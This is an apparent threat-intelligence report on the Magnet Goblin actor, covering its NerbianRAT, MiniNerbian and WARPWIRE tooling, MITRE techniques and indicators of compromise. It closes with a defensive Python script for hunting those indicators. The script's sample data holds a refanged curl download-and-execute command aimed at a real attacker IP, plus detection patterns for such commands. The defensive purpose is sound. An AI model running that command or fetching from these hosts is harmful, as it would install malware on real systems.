Keypoints
- Magnet Goblin exploits 1-day vulnerabilities in public-facing services (e.g., Ivanti Connect Secure) for initial access.
- The actor deployed a new Linux variant of NerbianRAT and a smaller MiniNerbian backdoor in multiple campaigns.
- Payloads observed include a WARPWIRE JavaScript credential stealer, Ligolo tunneling tool, and RMM tools such as ScreenConnect and AnyDesk.
- Malicious payloads were hosted on attacker-controlled servers and downloaded via HTTP URLs (examples: 94.156.71[.]115, 91.92.240[.]113, 45.9.149[.]215).
- NerbianRAT talks to its C2 over raw TCP in a custom binary protocol whose messages are AES-encrypted (with optional RSA protection for parts of the exchange); it enforces worktime windows and supports a range of remote commands.
- MiniNerbian communicates via HTTP POST to /dashboard/ and supports a small set of config and command-execution actions.
- Compromised Magento servers were reused as C2/hosting infrastructure and to stage additional payloads via injected commands in web app data.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used as the initial access vector by rapidly weaponizing 1-day flaws in exposed services. (‘Magnet Goblin quickly adopts and leverages 1-day vulnerabilities in public-facing services as an initial infection vector.’)
- [T1105] Ingress Tool Transfer – Attackers download ELF and other payloads from attacker-controlled servers after exploitation. (‘download and deployment of an ELF file which turned out to be a Linux version of NerbianRAT’ / ‘The payloads were downloaded from the following URLs: http://94.156.71[.]115/lxrt …’)
- [T1056.003] Input Capture: Web Portal Capture – A JavaScript stealer (WARPWIRE) captures the credentials VPN users submit and exfiltrates them via HTTP requests. (‘The stealer … sends VPN credentials to an external server over HTTP requests.’ / ‘https://www.miltonhouse[.]nl/pub/opt/processor.php’)
- [T1219] Remote Access Software – Use of legitimate RMM/remote access tools (ScreenConnect, AnyDesk) to administer compromised Windows hosts. (‘the threat actor’s Windows tools appear to include … ScreenConnect and AnyDesk’ / ‘ScreenConnect, which is downloaded from the attacker-controlled server at 94.156.71[.]115.’)
- [T1095] Non-Application Layer Protocol – The Linux NerbianRAT C2 uses raw TCP sockets with custom binary blobs for command-and-control. (‘Unlike the Windows variant, the Linux NerbianRAT utilizes raw TCP sockets, sending data blobs represented by structs back and forth in a custom protocol.’)
- [T1572] Protocol Tunneling – Use of tunneling tools (Ligolo) to pivot or tunnel traffic from compromised hosts. (‘Among the downloaded payloads are … Ligolo, an open-source tunneling tool written in GO.’)
Indicators of Compromise
- [IP] attacker infrastructure – 94.156.71[.]115, 91.92.240[.]113, 45.9.149[.]215 (used to host/download payloads)
- [C2 IP] NerbianRAT command server – 172.86.66[.]165 (NerbianRAT C2), 45.153.240[.]73 (additional C2)
- [URL] download/endpoints – http://94.156.71[.]115/lxrt, http://91.92.240[.]113/aparche2 (payload download endpoints)
- [Domain] compromised/C2 domains – www.fernandestechnical[.]com (compromised server used as C2), miltonhouse[.]nl (credential exfiltration endpoint)
- [SHA256] malware samples – 027d03679f7279a2c505f0677568972d30bc27daf43033a463fafeee0d7234f6 (NerbianRAT), d3fbae7eb3d38159913c7e9f4c627149df1882b57998c8acaac5904710be2236 (MiniNerbian)
Following exploitation of 1-day flaws in public-facing services (e.g., Ivanti Connect Secure and previously Magento/Qlik Sense), operators retrieved and executed payloads from attacker-controlled HTTP endpoints (examples: http://94.156.71[.]115/lxrt, http://91.92.240[.]113/aparche2). Observed payloads included a newly compiled Linux NerbianRAT ELF, MiniNerbian, a WARPWIRE JavaScript stealer that POSTs stolen VPN credentials to an external URL, the Ligolo tunneling tool for pivoting, and Windows RMM binaries such as ScreenConnect and AnyDesk. Compromised Magento instances were repurposed as hosting/C2 infrastructure and used to persistently stage download commands (for example, a curl command injected into web application data to fetch and run a binary).
Linux NerbianRAT initializes by collecting host details, building a bot ID (from /etc/machine-id and the PID), and loading hardcoded C2 hosts (e.g., 172.86.66[.]165). It enforces a working directory (/tmp/) and reads an AES-encrypted configuration file (tmp/debconf.socket) using a hardcoded AES key and an all-zero 16-byte IV; RSA can optionally be used for portions of the communication. Because the key and IV are hardcoded, a defender holding the sample can decrypt recovered configuration files, and any AES-only traffic captured on the wire, offline. The backdoor communicates with its C2 over raw TCP using a custom binary protocol: a valid C2 message begins with the magic ‘4r3f0’ followed by an AES-encrypted payload that, once decrypted, contains the ‘cmd’ marker. The implant supports numerous remote actions (execute commands synchronously or asynchronously, update the worktime windows, change check-in intervals, update configuration fields, retrieve results), which lets operators confine activity to chosen hours and issue arbitrary shell commands.
MiniNerbian is a streamlined variant that uses HTTP POSTs to /dashboard/ for C2 and implements three primary actions: system_cmd (execute a command and return its output), time_flag_change (toggle between always-on and scheduled operation), and core_config_set (update the runtime configuration). WARPWIRE is a JavaScript stealer that captures the credentials VPN users submit and exfiltrates them over HTTP to attacker-controlled endpoints. Operators also deployed tunneling (Ligolo) to forward traffic and RMM tools for interactive remote access, giving them both silent post-exploitation automation and hands-on-keyboard activity on compromised hosts.
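The indicators in the three paragraphs above (payload download URLs and the curl command staged in Magento data, the ‘4r3f0’ raw-TCP magic of NerbianRAT, the MiniNerbian POST /dashboard/ beacon, and the WARPWIRE exfiltration endpoint) can be turned into a small hunting script. The following is an added example written for this page, not code from the original report or from the actor's tooling: the indicators are copied from the page, but the proxy log format, the flow tuple layout, the Magento-style row, and the absolute config path /tmp/debconf.socket (the page gives tmp/debconf.socket under the enforced /tmp/ working directory) are assumptions, and all sample data is constructed. The raw-TCP check is a heuristic on the magic prefix only, since the encrypted body cannot be validated without the key.

```python
"""Hunting helpers for the Magnet Goblin / NerbianRAT indicators above.

Added example; not code from the original report. Log lines, flows and the
web-app data row are constructed. Indicators come from the page; the log
format, flow layout and absolute config path are assumptions.
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import urlsplit


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 94.156.71[.]115 into a matchable form."""
    return indicator.replace("[.]", ".")


# Indicators as written on the page, refanged for matching.
PAYLOAD_HOSTS = {refang(h) for h in ("94.156.71[.]115", "91.92.240[.]113", "45.9.149[.]215")}
C2_HOSTS = {refang(h) for h in ("172.86.66[.]165", "45.153.240[.]73")}
EXFIL_HOSTS = {refang(h) for h in ("www.miltonhouse[.]nl", "miltonhouse[.]nl",
                                   "www.fernandestechnical[.]com")}
NERBIAN_MAGIC = b"4r3f0"          # leading marker of Linux NerbianRAT C2 messages
MININERBIAN_PATH = "/dashboard/"  # MiniNerbian beacons by HTTP POST here
CONFIG_FILE = "/tmp/debconf.socket"  # assumed absolute form of tmp/debconf.socket

Finding = Tuple[str, str, str]  # (source, rule, evidence)

# Assumed proxy log line: client - - [time] "METHOD URL HTTP/x" status bytes
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan_proxy_log(lines: Iterable[str]) -> List[Finding]:
    """Flag payload downloads, MiniNerbian beacons and WARPWIRE exfiltration."""
    findings: List[Finding] = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        src, method, url, _status = m.groups()
        parts = urlsplit(url)
        host, path = (parts.hostname or "").lower(), parts.path
        if host in PAYLOAD_HOSTS and method == "GET":
            findings.append((src, "T1105 payload download", url))
        elif host in C2_HOSTS and method == "POST" and path == MININERBIAN_PATH:
            findings.append((src, "MiniNerbian beacon", url))
        elif host in EXFIL_HOSTS and method == "POST":
            findings.append((src, "WARPWIRE credential exfiltration", url))
        elif host in C2_HOSTS:
            findings.append((src, "contact with known C2 host", url))
    return findings


def nerbian_tcp_candidate(payload: bytes) -> bool:
    """First client bytes of a raw TCP stream: magic plus at least one AES block.
    Heuristic only; the encrypted body cannot be checked without the key."""
    body = payload[len(NERBIAN_MAGIC):]
    return payload.startswith(NERBIAN_MAGIC) and len(body) >= 16


def scan_flows(flows: Iterable[Tuple[str, str, int, bytes]]) -> List[Finding]:
    """flows: (src_ip, dst_ip, dst_port, first_bytes_sent_by_client)."""
    findings: List[Finding] = []
    for src, dst, port, first in flows:
        if nerbian_tcp_candidate(first):
            findings.append((src, "NerbianRAT raw TCP C2 (magic 4r3f0)", f"{dst}:{port}"))
        elif dst in C2_HOSTS:
            findings.append((src, "contact with known C2 host", f"{dst}:{port}"))
    return findings


# Download-and-execute one-liners of the kind staged in compromised Magento data:
# curl/wget fetching from a known payload host.
_CMD_RE = re.compile(r"\b(curl|wget)\b[^;|&\n]*?https?://([\w.\-]+)[^\s;|&]*", re.I)


def find_injected_downloads(text: str) -> List[Finding]:
    """Scan exported web application data (config values, templates) for them."""
    return [("webapp-data", "staged download command", m.group(0))
            for m in _CMD_RE.finditer(text) if m.group(2) in PAYLOAD_HOSTS]


def host_artifact_hits(existing_paths: Iterable[str]) -> List[Finding]:
    """Host-side check for the NerbianRAT configuration file."""
    return [("host", "NerbianRAT config file", p) for p in existing_paths if p == CONFIG_FILE]


# Constructed sample data (not real captures).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:10:01:02 +0000] "GET http://94.156.71.115/lxrt HTTP/1.1" 200 1843200
10.0.0.5 - - [10/Mar/2024:10:02:15 +0000] "POST http://45.153.240.73/dashboard/ HTTP/1.1" 200 312
10.0.0.9 - - [10/Mar/2024:10:03:40 +0000] "GET http://example.org/index.html HTTP/1.1" 200 5120
10.0.0.7 - - [10/Mar/2024:10:04:01 +0000] "POST https://www.miltonhouse.nl/pub/opt/processor.php HTTP/1.1" 200 17
""".splitlines()
SAMPLE_FLOWS = [
    ("10.0.0.5", "172.86.66.165", 443, NERBIAN_MAGIC + bytes(32)),
    ("10.0.0.9", "93.184.216.34", 443, b"\x16\x03\x01\x02\x00"),  # TLS ClientHello, benign
]
SAMPLE_ROW = ('design/footer/absolute_footer => "<!-- -->; '
              'curl http://91.92.240.113/aparche2 -o /tmp/a; chmod +x /tmp/a; /tmp/a"')

if __name__ == "__main__":
    for f in (scan_proxy_log(SAMPLE_LOG) + scan_flows(SAMPLE_FLOWS)
              + find_injected_downloads(SAMPLE_ROW) + host_artifact_hits([CONFIG_FILE])):
        print(*f, sep=" | ")
```

Run it as a script to see the four classes of finding against the constructed data; in practice feed `scan_proxy_log` your proxy or egress logs, `scan_flows` the first client bytes of each outbound TCP session (e.g. from Zeek or a pcap), and `find_injected_downloads` a dump of Magento configuration and template data. Exact-match IP lists age quickly, so treat the magic-prefix and POST /dashboard/ checks as the longer-lived signals.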